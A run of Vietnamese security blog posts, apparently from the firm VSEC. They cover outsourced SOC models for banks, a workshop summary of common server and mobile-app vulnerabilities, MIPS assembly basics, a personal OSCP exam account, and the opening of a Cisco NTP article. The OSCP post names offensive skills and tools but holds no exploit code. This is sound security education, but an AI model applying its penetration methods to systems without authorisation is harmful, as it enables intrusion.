Trung tâm Vận hành và Giám sát An ninh mạng – SOC – đảm nhiệm vai trò phát hiện và xử lý tấn công một cách nhanh nhất nhằm giảm thiểu rủi ro cho hệ thống công nghệ thông tin của doanh nghiệp. Đặc biệt đối với các đơn vị Tài chính Ngân hàng vốn là mục tiêu hàng đầu của tin tặc. Tuỳ thuộc vào quy mô hệ thống IT, nguồn lực nhân sự, các mô hình trung tâm SOC nào sẽ được các đơn vị này cân nhắc sử dụng?

Tại các quốc gia phát triển, trung tâm SOC (Security Operations Center) đã không còn xa lạ với các cơ quan chính phủ, doanh nghiệp lớn, các ngân hàng và tổ chức tài chính. Từ những năm đầu của thế kỷ 21, doanh nghiệp trong khu vực châu á đã có xu hướng sử dụng SOC như một phần tất yếu của hệ thống công nghệ thông tin. Song tại Việt Nam, mô hình này lại chưa được vận dụng nhiều do chi phí và thiếu nhân sự chuyên môn.

Mỗi đơn vị có thể xây dựng mô hình SOC khác nhau nhưng tựu chung đều nhằm mục đích đáp ứng nhu cầu bảo mật của doanh nghiệp. Với đặc điểm có lượng giao dịch lớn, kết nối đa điểm và phát triển nhanh chóng các loại hình digital banking, mobile banking, thanh toán ảo, … nên mô hình SOC cho ngành tài chính ngân hàng lại càng phải thiết kế sao cho phù hợp với quy mô của hệ thống.

5 cấp độ trung tâm SOC

Có 5 cấp độ của SOC được biết bao gồm: Level 1: Basic detection & Prevention (Phát hiện & Ngăn chặn), Level 2: Context, Control & Coverage (Bối cảnh, Kiểm soát và Phạm vi), Level 3: Basic Hunting & APT (Săn tìm tấn công chủ đích APT), Level 4: Remediation (Khắc phục) và Level 5: Deep Hunting (Săn tìm mối đe dọa sâu hơn). Với mỗi cấp độ này, nhà điều hành doanh nghiệp sẽ cần một đội ngũ nhân sự ở các cấp độ chuyên môn tương đương. Từ những nhân sự thực hiện nhiệm vụ giám sát, ngăn chặn, cảnh báo cho đến mức độ phức tạp hơn là các nhà phân tích, nhà nghiên cứu các mối đe doạ và các thành viên săn tìm mối đe doạ, …

Trung bình, một trung tâm SOC sẽ cần tối thiểu từ 10 đến 20 nhân sự đảm nhận công việc chuyên biệt. Mô hình SOC càng phức tạp, số lượng nhân sự càng lớn thì càng đặt ra thách thức về chi phí cho nhà quản lý. Bởi chi phí chi trả không chỉ dừng ở mức lương cho chuyên gia mà còn là chi phí để tuyển dụng, thuê người ngay từ giai đoạn xây dựng SOC ban đầu. Chính vì điều này mà trên thế giới đã bắt đầu phân chia ra 3 mô hình SOC mà theo Gartner các doanh nghiệp có thể lựa chọn là: SOC nội bộ (fully insourced), Thuê ngoài (fully outsourced) và Kết hợp (hybrid/co-managed SOC)

Dù là mô hình SOC nội bộ hay kết hợp, nhà quản trị doanh nghiệp cũng đều phải tính toán đến chi phí duy trì nhân sự, đầu tư trang thiết bị và công nghệ. Cho dù hệ thống SOC mới đang được lên kế hoạch, doanh nghiệp cũng đã phải chi trả chi phí để thuê nhân sự để thiết kế và xây dựng mô hình vận hành trước khi thu được hiệu quả có thể đo đếm được. Chính vì vậy, cho dù có nguồn vốn lớn các Ngân hàng và tổ chức tài chính không phải lúc nào cũng chọn lựa việc xây dựng một trung tâm SOC nội bộ hay kết hợp.

Mô hình trung tâm SOC Thuê ngoài – VSEC

“Trong 20 năm cung cấp dịch vụ bảo mật tại Việt Nam, phục vụ hơn 50% khách hàng Ngân hàng, tổ chức tài chính, chúng tôi tin rằng mô hình SOC thuê ngoài có thể đáp ứng được câu chuyện tối ưu nguồn lực tài chính và đầu tư cho doanh nghiệp. Chúng ta có thể tốn hàng nghìn giờ để nỗ lực cứu vãn hệ thống công nghệ sau tấn công nhưng chỉ cần chưa quá 4 giờ đồng hồ để tìm ra và ngăn chặn hiểm hoạ thông qua trung tâm SOC” – Ông Vũ Thế Hải, SOC Manager VSEC chia sẻ.

Với Trung tâm SOC, VSEC – Công ty cổ phần An ninh mạng Việt Nam mở rộng phạm vi cung cấp dịch vụ đúng với tiêu chí là MSSP – Managed Security Service Provider – Nhà cung cấp dịch vụ bảo mật toàn diện tại Việt Nam. Trung tâm SOC của VSEC cũng là trung tâm SOC đầu tiên tại Việt Nam được nhận chứng chỉ CREST- chứng nhận đạt các tiêu chuẩn quốc tế về năng lực chuyên gia, kinh nghiệm chuyên môn, khả năng công nghệ, các chính sách, quy trình, thủ tục và đạo đức nghề nghiệp liên quan đến việc cung cấp dịch vụ trung tâm SOC. Không chỉ cung cấp một giải pháp hoàn chỉnh của SOC mà VSEC cũng có thể tư vấn, đào tạo và triển khai thử nghiệm mô hình SOC tiêu chuẩn quốc tế phù hợp theo nhu cầu của từng doanh nghiệp.

Vào một ngày hè cuối tháng 4/2017, ông Trương Đức Lượng, Giám đốc Công ty VSEC, đã có một bài chia sẻ về đề tài rất nóng hiện nay là rủi ro bảo mật thông tin tại một cuộc hội thảo nhỏ do VSEC tổ chức tại Hà Nội, Việt Nam. Hội thảo đề cập khá nhiều phương diện mà rủi ro bảo mật thông tin có thể được gây ra ở phía máy chủ cũng như máy trạm.

Link sự kiện Workshop “Rủi ro bảo mật & An toàn thông tin” của VSEC:

https://www.youtube.com/watch?v=yuekJt9C1fU

Rủi ro phía máy chủ

Các rủi ro bảo mật liên quan đến máy chủ có thể do nhiều nguyên nhân, chẳng hạn như cơ chế xác thực yếu, tham chiếu các đối tượng không an toàn, thiếu chức năng kiểm soát truy cập, và sử dụng các thành phần có lỗi bảo mật.

Cơ chế xác thực yếu (Poor Authorization and Authentication) xảy ra chủ yếu do thiếu hoặc không kiểm soát xác thực. Một số ứng dụng tại Việt Nam thường sử dụng các giá trị không đổi như IMEI, UUID làm phương thức xác thực duy nhất. Tại hội thảo, diễn giả đưa ra một số ví dụ về việc một ứng dụng sử dụng UUID để làm phương thức xác thực, và một vài ví dụ về việc ứng dụng phân các API ra thành các lớp theo mức độ bảo mật khác nhau (Low Security, Medium Security, High Security).

Tham chiếu các đối tượng không an toàn (Insecure Direct Object Reference) xảy ra khi lập trình viên để lộ tham chiếu tới các đối tượng trong hệ thống (file, thư mục, các khóa trong cơ sở dữ liệu) mà không kiểm soát sự truy cập. Kẻ tấn công có thể truy cập tới các dữ liệu trái phép. Đây là một trong những chủ đề nhiều khách mời chú ý đến nhất bởi mức độ nguy hiểm của nó. Diễn giả cung cấp hình ảnh một số app mobile banking của ngân hàng gặp phải lỗi này. Cách phòng chống được đưa ra là sử dụng Access Reference Map và Access Modal Diagram. Một khách mời chia sẻ đã từng sử dụng Access Reference Map nhưng lại làm rối các ID ở phía client, vì vậy không an toàn. Một khách mời khác chia sẻ không sử dụng Access Reference Map nhưng để trường ID rất phức tạp, kẻ tấn công khó có thể đoán ra được.

Thiếu chức năng kiểm soát truy cập (Missing Function Level Access Control) xảy ra khi server không kiểm soát user khi sử dụng hàm này có quyền thực thi hay không. Điều này dẫn đến kẻ tấn công có thể sử dụng các quyền không được phép. Diễn giả đưa ra một số hình ảnh về trường hợp bất kì người nào cũng có thể sử dụng hàm của người quản trị, lấy thông tin từ hệ thống Mail server.

Sử dụng các thành phần có lỗi bảo mật (Using Components with Known Vulnerabilities) xảy ra khi server sử dụng các thành phần (hệ điều hành, framework, thư viện, v.v…) đã có các lỗ hổng được công bố. Một số lỗi đã được tìm ra và khai thác tự động bởi các vài công cụ, tuy nhiên chính điều này làm tăng nguy cơ hệ thống bị tấn công. Biện pháp tốt nhất để phòng chống rủi ro này là thường xuyên cập nhật hệ thống lên các phiên bản mới nhất, cắt giảm các chức năng không cần thiết. VSEC cũng chia sẻ với mọi người một tình huống khi triển khai dịch vụ cho đối tác, bên đối tác biết rằng framework đó cũ, có nhiều lỗ hổng nhưng không thể cập nhật lên phiên bản mới được vì điều này làm ảnh hưởng đến toàn bộ hệ thống bên họ.

WannaCry, virut ransomware đang làm mưa làm gió tại 150 nước hiện nay

(Nguồn: theverge.com)

Rủi ro phía máy trạm

Một số nguyên nhân gây ra rủi ro bảo mật thông tin từ phía máy trạm bao gồm: Lưu trữ các thông tin không an toàn, Lỗi rò rỉ dữ liệu không mong muốn, Sử dụng đường truyền không an toàn, Sử dụng thuật toán mã hóa yếu, và Thiếu các phương thức bảo vệ tệp tin thực thi.

Lưu trữ các thông tin không an toàn (Insecure Data Storage): Xảy ra khi người lập trình lưu các thông tin quan trọng vào trong thiết bị nhưng không mã hóa hay có biện pháp bảo vệ. Khi diễn ra đưa ra một số trường hợp lưu Token trong máy dưới dạng cleartext, các khách mời cũng chia sẻ về một số phương án, cách phòng chống khi gặp những trường hợp như vậy.

Lỗi rò rỉ dữ liệu không mong muốn (Unintended Data Leakage): Lỗi này thuộc về hệ điều hành và framework, lỗi này nằm ngoài mong muốn của lập trình viên. Một số điểm dễ bị lộ thông tin như bộ đệm copy/paste, log hệ thống, các dữ liệu phân tích gửi cho bên thứ ba. Các khách mời cũng chia sẻ về cách cài ứng dụng nào để phòng chống việc bị hiện ảnh chụp màn hình trên Recent App, chống copy những gì, v.v…

Sử dụng đường truyền không an toàn (Insufficient Transport Layer Protection): Lỗi này xảy ra khi các ứng dụng không sử dụng các giao thức mã hóa, hoặc có sử dụng thì sử dụng các phiên bản cũ, hoặc chỉ mã hóa một phần của đường truyền. Diễn giả có đưa ra một số thông số thống kê về số lượng app không kiểm tra certificate của server, bỏ qua các lỗi về certificate. Diễn giả có đưa thêm cách phòng chống mà một số ứng dụng của Việt Nam thường dùng như mã hóa gói tin gửi lên, tạo signature cho gói tin. Nhưng diễn giả cũng gợi ý thêm rằng nên mã hóa cả gói tin nhận về, và đưa ra một ví dụ về việc khai thác bằng cách thay đổi các thông tin trả về từ phía server.

Sử dụng thuật toán mã hóa yếu (Broken Cryptography): Lỗi này ảnh hưởng đến tính bí mật của dữ liệu cần mã hóa. Diễn giả đưa ra hình ảnh một số ứng dụng hardcode mật khẩu mã hóa trong tệp tin, sử dụng mã hóa base64 không an toàn, v.v…

Thiếu các phương thức bảo vệ tệp tin thực thi (Lack of Binary Protections): Diễn giả trình bày về quá trình biên dịch từ mã java sang tệp tin apk, và giải thích tại sao tệp tin apk lại dễ dàng bị dịch ngược. Khi bị dịch ngược, các thông tin nhạy cảm bị lộ như: API, các phương thức mã hóa, giải mã, cấu trúc hoạt động của chương trình. Diễn giả cũng đưa ra một số công cụ làm rối như DexGuard, ProGuard cho Android và một số kĩ thuật làm rối.

Kết luận

Đề cập trong cuộc hội thảo của ông Lượng, Giám đốc Công ty VSEC, chỉ là các nguyên nhân chủ yếu của rủi ro bảo mật thông tin. Ngoài ra còn nhiều rủi ro khác nữa. Tuy nhiên, nếu khắc phục tốt các rủi ro này thì hệ thống CNTT của doanh nghiệp đã tránh được 91% nguy cơ. Ngày nay, thế giới càng ngày càng kết nối, tại điều kiện thuận lợi cho công việc của chúng ta nhưng cũng hỗ trợ bọn tin tặc tốt hơn. Đã đến lúc thực sự nghiêm túc nhìn nhận vấn đề bảo mật thông tin!

Các bạn sẽ tự hỏi là tại sao mà mình viết bài về hợp ngữ MIPS này , vì kiến thức cũng không có gì mới mà lại viết. Lý do ở đây là hiện tại mình đang muốn nghiên cứu , tìm hiểu khai thác về các thiết bị IoT ( đặc biệt là các thiết bị Router wifi ). Vậy nên các bạn biết rồi đó các thiết bị IoT thì thường sử dụng MIPS là kiến trúc bộ tập lệnh RISC.

Nói đến bộ tập lệnh thì có 2 loại là CISC và RISC.

– CISC được sử dụng chủ yếu trên các máy tính cá nhân và server lý do đơn giản là bộ tập lệnh này nhiều và rất phức tạp dẫn đến tiêu tốn tài nguyên và điện năng. Chính vì vậy các thiết bị IoT thì không thích thú lắm ?).

– Ngược lại RISC thì lại ít và đơn giản hơn gây tiêu tốn ít tài nguyên và điện năng hơn nên nó hợp cho những thiết bị IoT hoặc thiết bị di động.

Xàm xí vậy thôi vào chủ đề chính của ngày hôm nay thôi.

Hợp ngữ MIPS.

MIPS sau nhiều lần nâng cấp thì hiện tại có 2 phiên bản 32 bit và 64 bit nhưng bài viết này và về sau mình chỉ tập chung vào 32 bit cho nó thân thiện, với mình cũng đang tìm hiểu nên các bạn thông cảm nhé ^^.

MIPS có tổng cộng 32 thanh ghi để lưu giá trị được đánh số từ 0 – 31 cùng với quy ước chung khi sử dụng. Trong đó thì thanh ghi 0 thì luôn được gán cứng với giá trị 0.

Định dạng mã lệnh MIPS

Trên một số bộ xử lý, đặc biệt là bộ xử lý CISC, kích thước của mã lệnh thay đổi theo lệnh và toán hạng của nó.

Do MIPS giống với hầu hết các bộ xử lý RISC, sử dụng mã lệnh có độ dài cố định. Tất cả mã lệnh MIPS chính xác với 32 bit. Mã lệnh có độ dài cố định mang lại lợi thế là tìm nạp lệnh đơn giản hơn, đồng nghĩa là bộ xử lý nhỏ hơn, rẻ hơn. Đơn giản và nhỏ hơn sẽ nhanh hơn, tiêu thụ điện năng và chi phí sản xuất thấp hơn.

Register Instructions

Các lệnh thanh ghi có hai thanh ghi nguồn và một thanh ghi đích.

Định dạng lệnh Register.

Giải thích:

Opcode( 6 bits): Thanh ghi này chứa 6 bits 0 chỉ ra rằng đây là lệnh thanh ghi (RI)

Function( 6 bits): Thanh ghi này sử dụng 6 bit để phân biệt các mã lệnh với nhau

Source 1, Source 2( 10 bits): 2 Thanh ghi này để thực hiện tính toán.

Destination (5 bits): Thanh ghi này lưu trữ kết quả tính toán được.

Shifft Amount ( 5 bits): Số bit cần dịch trái, dịch phải khi có lệnh dịch bit.

Ví dụ: add $t3, $t4, $t1

Trong đó: $t3 = 11, $t4 = 12, $t1= 9

Jump Instructions

Định dạng lệnh Jump

Trường hợp nếu 6 bits ngoài cùng bên trái là 00001x thì đây là lệnh nhảy không điều kiện.

Ví dụ:

000010 xxxxxxxxxxxxxxxxxxxxxxxxxx ~ j label

000011 xxxxxxxxxxxxxxxxxxxxxxxxxx ~ jal label

Nhìn vào đây các bạn sẽ tự hỏi có 26 bit thì làm thế nào mà nó nhảy được đến địa chỉ đích 32 bit. Trường địa chỉ đích chuyển thành địa chỉ 32 bit, được thực hiện tại thời điểm chạy, khi lệnh nhảy được thực thi.

Cách thực hiện:

– Dịch 26 bit sang trái hai vị trí 2 bit bậc thấp trở thành “00”.

– Sau khi thay đổi ta cần điền bốn bit bậc cao của địa chỉ. Bốn bit này đến từ bậc cao trong PC ( Program Counter).

Coprocessor Instructions

Nếu 6 bits ngoài cùng là 0100xx, thì lệnh được xử lý bởi bộ đồng xử lý / coprocessor ( Một phần mở rộng cho MIPS CPU cở bản ). Hai bits cuối cùng đại diện cho bộ đồng xử lý (coprocessor).

Immediate Instructions

Nếu 6 bit ngoài cùng bên trái khác với tất cả các mẫu ở trên , thì lệnh được sử dụng cho định dạng tức thời.

Các lệnh tức thời sử dụng một thanh ghi nguồn , môt thanh ghi đích và 16 bit toán hạng nguồn tức thời.

Toán hạng tức thời giới hạn 16 bit vì vậy số có không dấu từ 0 – 65535 hoặc có dấu -32768 – 32767 ( bộ xử lý MIPS sử dụng bù 2 cho toán hạng có dấu )

Ví dụ: addi $t1, $t5, 7

Bài viết đến đây là hết rồi, mình viết bài này chủ yếu là giới thiệu sơ qua cái chung và tổng quát nhất của hợp ngữ MIPS thôi. Bài sau mình sẽ nói chi tiết về các lệnh mình coi là quan trong trong MIPS :D. Đây sẽ là một seri dài hạn ai đọc được thì cho mình xin một like và subscribe nhé ^^.

Link tham khảo:

https://chortle.ccsu.edu/AssemblyTutorial/index.html

https://en.wikipedia.org/wiki/MIPS_architecture

Hi, đển hẹn lại lên, cứ cuối tháng là mình lại làm một cái blog mới. Lần này chủ đề sẽ khác khác một xíu. Về cơ bản là đầu tháng 6 này, sau 1 năm cứ gọi là tạm ra trường, mình đi thi chứng chỉ đầu tiên về bảo mật trong đời mình, đó là OSCP, và may mắn không làm nhục mệnh, mình đã pass :’>. Nên là bài này sẽ viết về trải nghiệm thi OSCP vừa rồi của mình, và những điều rút ra từ đó. Mong những thông tin này có ích

OSCP Examination

Đầu tiên vầy OSCP nó là cái gì? Offensive Security Certified Professional (OSCP) là một chương trình chứng chỉ mà tập trung vào những kỹ năng tấn công và kiểm thử bảo mật. Nó bao gồm 2 phần: một bài thi pentest trong vòng 23h45p và một report nộp trong vòng 24h ngay sau đó. OSCP là một bài thi rất là thực tiễn.

Vầy tại sao lại nên thi OSCP? Mình có 2 lý do chính:

– Để học hỏi và nâng cao kiến thức lẫn kỹ năng về kiểm thử bảo mật. Như đề cập ở bài trước, mình mới chuyển qua pentest gần đây thôi, nên cần một cái gì đó định hướng rõ ràng hơn về mảng này. Và khi đăng ký thi thì sẽ được trải nghiệm thực hành hơn 54 bài labs rất thực tế và có bộ tài liệu hướng dẫn rất rõ ràng và cụ thể.

– Để tăng lương (đương nhiên rồi). Đợt trước có bài nào đó của bên Cyradar bảo rằng chứng chỉ OSCP giúp tăng 200% lương ?? OSCP hiện nay là một chứng chỉ đang lên, vì lý tính thực tiễn lẫn độ khó của nó. Nó được xếp trong TOP 5 chứng chỉ pentest đáng mơ ước và cần có cho pentester. Nó sẽ giúp tăng cao giá trị của bản thân lên rất nhiều, vì bên cạnh CEH, đây là một chứng chỉ yêu cầu cho nhiều bên thầu.

Kỹ năng bạn sẽ có được qua course của OSCP:

– Passive Information Gathering

– Active Information Gathering

– Vulnerability Scanning

– Buffer Overflows

– Working with Exploits

– File Transfers

– Privilege Escalation

– Client-Side Attack

– Web Application Attacks

– Password Attacks

– Port Redirection and Tunneling

– The Metasploit Framework

– Bypassing Antivirus

Hành trình OSCP của mình

Bắt đầu vào phần chính của bài này nào. Mình sẽ đi qua những gì mình đã trải qua trong course của OSCP và những gì mình rút ra được (kinh nghiệm lẫn lời khuyên).

Bởi vì công ty yêu cầu một nhân viên nào đó có chứng chỉ OSCP, và nếu có thì sẽ được tăng lương =))) và mình cảm thấy mình khá có duyên với các thể loại thi cử nên mình nhận thôi :v

Và hành trình sẽ được chia là 3 giai đoạn chính:

Giai đoạn chuẩn bị:

Có một số thứ bạn cần chuẩn bị trước khi đăng ký thi.

Đầu tiên thông tin về chứng chỉ, bạn phải biết mình đang thi cái gì và thể thức thi như thế nào đúng không? Nó sẽ nằm tại đây https://support.offensive-security.com/oscp-exam-guide/.

Thứ hai là những kiến thức và kỹ năng cần thiết. Bởi vì khi bạn đăng ký thi, bạn sẽ phải mua một gói bao gồm lệ phí thi, Penetration Pentesting with Kali Course bao gồm một quyển PDF hơn 800 trang và hơn 8 tiếng videos hướng dẫn, và VPN để bạn kết nối tới môi trường lab (cái giá trị nhất trong toàn gói). Lab bạn có thể mua theo các mức 30 ngày, 60 ngày hoặc 90 ngày tùy dự định của bạn. Mình thì chọn 60 ngày. Bởi vì thời gian là tiền bạc, trước khi bạn mua gói này, bạn cần phải cuẩn bị những kiến thức lẫn tinh thần phù hợp, nếu không thì bạn sẽ bị ngợp (giống mình) về kiến thức lẫn kỹ năng, và trong 60 ngày đấy đảm bảo bạn sẽ không đủ thời gian để thực hành đủ để thi. Bởi vì trên trường mình cũng có được dạy và thực hành những cái này rồi, nên là mình cũng khá là quen nên mình không bỡ ngỡ lắm.

Vầy những gì bạn cần chuẩn bị về mặt kiến thức là gì:

– Môi trường Linux và Windows. Đây là cái mình coi là quan trọng nhất. Bạn cần phải có kiến thức lẫn quen thuộc khi làm việc với cả hai môi trường Windows và Linux, đặc biệt là Command Line Interface trên Linux bởi vì đó là nơi bạn làm việc nhiều nhất, đặc biệt là Kali. Nếu bạn còn mới lạ, quyển sách này có thể có ích Kali Linux Revealed.

– Kỹ năng lập trình cơ bản. Cái này bao gồm việc đọc, hiểu và có thể modify code Python, Bash, Perl,… Bạn sẽ không cần phải viết một exploit hoàn chỉnh, những bạn cần ít nhất hiểu được cách thức hoạt động của nó. Có hàng triệu website ngoài kia có thể giúp bạn làm quen với Python. Mình trước đây là nhảy bụp vào luôn nên cũng không có một phương thức nào đó có ích cho lắm :v

– Web Application Attacks (SQLi, Local File Inclusion, Remote File Inclusion, Command Injection,…) trong labs bạn sẽ phải khai thác chủ yếu của Web Applications, nên bạn cần có những hiểu biết nhất định về các thể loại tấn công này. Web Application Hackers Handbook quyển này rất có ích đối với bạn nào mới chập chững làm quen với vấn đề này.

– Những Tools chạy trên Kali/Linux: Cái cuối cùng là bạn cần phải làm quen hoặc ít nhất là biết cách hoạt động của những tools – thứ mà bạn cần phải dựa vào nó để có thể hoàn thành bài thi. Một số tools bạn cần phải biết như là: Metasploit, Nmap, Netcat.

– Làm quen với môi trường Labs: Để đỡ bỡ ngỡ khi tần công một máy tính. Bạn có thể làm quen với những dạng lab tương tự như OSCP ở trên Hack The Box, hoặc tham khảo tại link đây OSCP Like vulnerable machines list by abatchy.

Giai đoạn trước khi lên thớt:

Khi bạn đủ tự tin và chuẩn bị đủ tinh thần, bạn có thể đăng ký bắt đầu trên trang chủ của Offensive Security. Sau khi bạn đăng ký thời hạn lab, đến ngày bạn đăng ký, bạn sẽ nhận được email bao gồm tài liệu về khóa học lẫn hướng dẫn kết nối tới môi trường labs thực hành.

Không biết các bạn như thế nào, nhưng mình luôn luôn có thói quen là có những kiến thức căn bản trước, biết mình phải làm gì mới bắt tay vào làm. Nên là mình chia giai đoạn này làm 2 phần, lý thuyết và thực hành.

Lý thuyết:

Mình dành ra gần 1 tháng đầu tiên chỉ để đọc và nghiên cứu tài liệu được cung cấp. Nó bao gồm một cuốn sách PDF hơn 800 trang và một bộ videos trực quan đi kèm. Trong cuốn sách cũng có những Exercise ở cuối mỗi mục, nếu bạn làm hết và nộp lại reports thì bạn sẽ được thêm 5 điểm chuyên cần vào kết quả của bài thi cuối cùng. Cảm nhận của mình về tài liệu thì nó rất là đầy đủ, nó thiết kế để cho một người mới hoàn toàn có thể có được những kiến thức căn bản nhất, và nó cũng rất rộng và toàn diện về tất cả các mảng. Nếu mà không có giai đoạn chuẩn bị trước đấy, thì thật sự bạn sẽ bị ngợp bởi lượng thông tin mà nó mang lại.

Lời khuyên và kinh nghiệm rút ra của mình là bạn có thể không cần phải xem và biết toàn bộ, nhưng bạn nên đọc qua một lần. Bạn có thể skip những phần mà bạn cho là bạn biết rồi, và đọc những phần mà bạn cảm thấy mới mẻ. Bởi vì rằng, có những thông tin và công cụ mà trong tài liệu nó rất hay và hữu ích, nó sẽ trực tiếp giúp bạn làm dễ hơn các bài labs cũng như bài thi.

Thực hành:

Đây là phần giá trị nhất của toàn bộ gói, theo như phần lớn mọi người nhận xét. Bởi vì đây là thứ giúp bạn chuẩn bị cho bài thi của mình, cũng có thể coi như là đề mẫu đi.

Có tổng cộng 57 public servers để bạn tấn công, và thêm vào đó có 3 internals server mà bạn có thể pivot tới khi bạn có được keys từ một máy nào đó ở public. Trong vòng thời gian labs, mình dã root được đâu đó khoảng 52/57 máy.

Kinh nghiệm mình rút ra được đó là:

– Bạn nên bắt đầu với máy Alpha và Beta trước, với IP là .71 và .72. Bởi vì đó là những bài mẫu, trên students forum có mẫu reports sẫn rất rất là chi tiết về cách tiếp cận lẫn phương pháp luận để có thể tấn công và lên quyền vào một servers.

– Có 2 keywords bạn luôn luôn cần nhớ đó là “Enumerate more” và “Try Harder”. Thực sự sau khi bạn hoàn thành cái này, bạn sẽ khắc cốt ghi tâm 2 cụm từ này, vì nó chính là từ khóa mỗi khi bạn stuck ở đâu đó. Đôi khi bạn chỉ cách đáp án 1 cái port bị ẩn hoặc là cái sub directories mà bạn chưa enum ra thôi. Về enumerations, mình có tìm được một tools khá hay và chi tiết, giúp mình trong một máy của bài thi cuối cùng: https://github.com/Tib3rius/AutoRecon.

– Luôn luôn note lại những gì bạn tìm thấy được và đạt được. Mình có một file excel để ghi lại những gì mình đã enum ra, cũng như exploit code mình dùng để khai thác và lên quyền. Bởi vì có một số máy nó yêu cầu việc bạn phải xâm nhập vào một máy khác để bạn có thể truy cập được vào nó. Việc này sẽ giúp bạn dễ dàng quay trở lại máy đấy hơn và biết được mối liên kết giữa từng máy để quay lại.

– Bạn có thể tham khảo students forum để có được những hướng dẫn nếu bạn stuck ở đâu đó quá lâu. Ở đấy có những post để trao đổi về từng máy, hoặc bạn cũng có thể inbox cho những người cùng thi với bạn để có thêm nhiều hướng tiếp cận hơn. Tuy nhiên bạn không nên lạm dụng nó, vì bạn sẽ không có nó khi thi.

– Luôn luôn revert lại một máy trước khi làm nó. Bởi vì không phải một mình bạn truy cập tới môi trường labs đấy. Bạn nên revert lại thứ người khác đã làm trên đấy trước đấy để đảm bảo môi trường clean nhất có thể.

Ngày lên thớt:

Trước ngày thi, bạn nên chuẩn bị rất kỹ càng, về cả thể chất lẫn tinh thần. Bởi vì đó là bài thi kéo dài 24 tiếng. Không giúp đỡ, không gợi ý, chỉ có mình bạn và người giám sát.

Chuẩn bị sức khỏe, kế hoạch đồ ăn và thức uống bạn cần để hoàn thành bài thi. Ngủ đủ giấc. Và trong suốt khoảng thời gian thi bạn được phép ra khỏi chỗ, đi lại, và nghỉ ngơi. Không nên quá stress khi bạn bị kẹt ở đâu đó, hãy dừng lại, tạm nghỉ, hoặc chuyển hướng sang máy khác. Tuyệt đối không nên để stress, hoảng loạn và lo lắng chiếm cứ tâm trí của bạn. Trong ngày thi, trong suốt 12 tiếng đầu tiên mình chưa hề có shell trên một con máy nào cả, tất cả đều thiếu một xíu xíu gì đó, và thề là bạn không biết mình chửi thề đề bài này nhiều thế nào đâu. Và sau 3/4 thời gian, sự việc nó tiến triển hơn một xíu khi mình làm xong được mỗi bài Buffer Overflow (bài tương tự như vẽ đồ thi hàm số trong thi đại học ý). Nhưng sau khi mình đi ra ngoài hít thở khoảng 20p như này, mình quay lại tự dưng mình thấy cái mà mình trước đấy chưa thấy, và mình tìm lại được cái guồng của mình. Kết quả là mình kết thúc bài thi với chỉ thiếu 1 máy chưa lên được root. Một kết quả mình biết là thừa sức đỗ rồi. Từ đó mới hiểu rõ được 2 câu thần chứ “Enumerate more” và “Try Harder”.

Trong vòng 24h tiếp theo thì bạn phải hoàn thành và submit report, về quá trình enumeration cũng như cách thức bạn khai thác và lên quyền. Report yêu cầu phải có những screenshots và hướng dẫn cụ thể để reproduce, nên là bạn phải đảm bảo rằng chụp ảnh các bước trong quá trình làm bài, bởi vì khi bạn kết thúc bài thi, kết nối VPN sẽ ngắt, và không còn cơ hội để bạn kết nối với server để thực hiện lại đâu.

Và cuối cùng thì, sau khi nộp reports, kết quả sẽ có trong vòng 10 ngày làm việc. Và khi kết quả tới, yayyy, cuối cùng mình cũng có cơ hội được tăng lương =))))

Kết

Và trong cả quá trình học lẫn thi, luôn tìm sự thích thú. Luôn có một cái niềm vui gì đó không nhỏ thì cũng lớn khi mà bạn học được cái mới, những cái mà bài phải ồ lên, hoặc là khi bạn thành công root được một con máy khoai vchhh mà bạn tốn mấy ngày để làm nó :’> So have fun.

Be Duy ( aka chalizard )

Người đi rồi… áo mùa thu khép lại

Giấu trong tà một chút nắng vàng hanh

Buồn của tôi thay lá mọc trên cành

Chưa rụng vội để chờ mùa thu khác

Xin chào mọi người lại là mình đây, một dân nghiệp dư mới vào nghề. Dạo này do làm dự án công ty bận bịu quá chẳng có thời gian mà tìm hiểu và viết blog nữa ☹. Nay nhân một ngày thảnh thơi như cái tình trạng FA vào mùa đông của mình ,đành dành một chút thời gian để viết tiếp cái Seri dài tập chưa có hồi kết này để các bạn đọc tiếp ?).

Các lệnh tính toán số học.

Lệnh cộng.

Theo như mình biết thì gồm:

Cú pháp:

Đối với add,addu: <tên lệnh > <thanh ghi đích> , <thanh ghi 1>, < thanh ghi 2>

Đối với addi,addiu: <tên lệnh > <thanh ghi đích> , <thanh ghi 1> , < hằng số>

Ví dụ cụ thể:

Biên dịch file .c trên với kiến trúc MIPS như sau:

mips-linux-gnu-gcc -O3 -S -mfp32 -march=mips32 Sum.c

Hình ảnh khi được biên dịch ra MIPS Assembly.

Tại sao mình khai báo signed int nhưng khi biến dịch ra assembly lại nó lại dùng addiu. Thì theo như mình lướt dạo trên mạng thấy phần lớn trình trình biên dịch sẽ sử dụng addu và addiu để tránh “bẫy” tràn. Và add,addi chỉ sử dụng khi tự code hoặc được sử dụng trong ISAs như x86,ARM…

Lệnh trừ.

Cú pháp:

sub,subu: <tên lệnh > <thanh ghi đích> , <thanh ghi 1>, < thanh ghi 2>

Ví dụ cụ thể:

Hình ảnh khi được biên dịch ra MIPS Assembly.

Lệnh nhân

Ví dụ cụ thể:

Lệnh chia.

Thôi đoạn này mình lười lắm không chụp ảnh đâu ?). Cái này cũng tương tự như các hình trên thôi.

Lệnh tính toán Logic.

Ví dụ cụ thể.

Hình ảnh khi được biên dịch ra mã Asembly

Kết thúc phần 2 cho mùa đông lạnh lẽo ở đây thôi. Hẹn các bạn những phần tiếp theo nhé ^^.

Vu Van Tien ( aka n0_be3r )

Lời đầu tiên cho mình xin gửi lời chào tới toàn thể các bạn/anh/chị/em trong lĩnh vực Network Security. Ý tưởng chính của series này nhằm cung cấp những kiến thức cơ bản nhất cho những ai muốn tìm tìm hiểu về “networking security” .

Trong bài viết này, mình sẽ giới thiệu một số dịch vụ triển khai dựa trên cở sở hạng tầng mạng của thiết bị Cisco, nhằm giúp cho người quan trị làm chủ hệ thống mạng như bảo mật, kiểm soát và xử lý sự cố được tốt hơn

Hiện nay, vấn đề bảo mật mạng là một vấn đề rất nan giải cho các công ty, cơ quan nhà nước, trường học và cả những người quản trị mạng…và làm sao để có thể xây dựng một hệ thống mạng an toàn ? Series này mình sẽ đề cập đến việc để thiết lập, cấu hình các giao thức syslog, NTP và SSH dưới góc độ “security“. Ở trong phần này mình sẽ nói về giao thức NTP và cách cấu hình an toàn với NTP trong một hệ thống mạng.

NTP là gì ?

